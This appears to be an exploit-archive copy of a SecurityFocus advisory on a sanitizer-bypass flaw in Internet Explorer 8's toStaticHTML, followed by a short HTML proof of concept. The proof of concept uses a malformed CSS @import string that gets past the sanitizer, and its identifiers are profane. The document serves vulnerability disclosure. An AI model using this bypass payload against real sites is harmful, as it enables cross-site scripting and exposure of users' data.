38 lines
No EOL
1.1 KiB
HTML
38 lines
No EOL
1.1 KiB
HTML
source: https://www.securityfocus.com/bid/42467/info
|
|
|
|
Internet Explorer 8 is prone to a security-bypass weakness.
|
|
|
|
Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call.
|
|
|
|
Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible.
|
|
|
|
<script type="text/javascript">
|
|
function fuckie()
|
|
{
|
|
var szInput = document.shit.input.value;
|
|
var szStaticHTML = toStaticHTML(szInput);
|
|
|
|
ResultComment = szStaticHTML;
|
|
document.shit.output.value = ResultComment;
|
|
}
|
|
</script>
|
|
|
|
<form name="shit">
|
|
<textarea name='input' cols=40 rows=20>
|
|
</textarea>
|
|
<textarea name='output' cols=40 rows=20>
|
|
</textarea>
|
|
|
|
<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
|
|
</form>
|
|
|
|
|
|
<style>
|
|
|
|
} () import <%7D () import> url('//127.0.0.1/1.css');aaa
|
|
|
|
{;}
|
|
|
|
</style>
|
|
|
|
<div id="x">Fuck Ie</div> |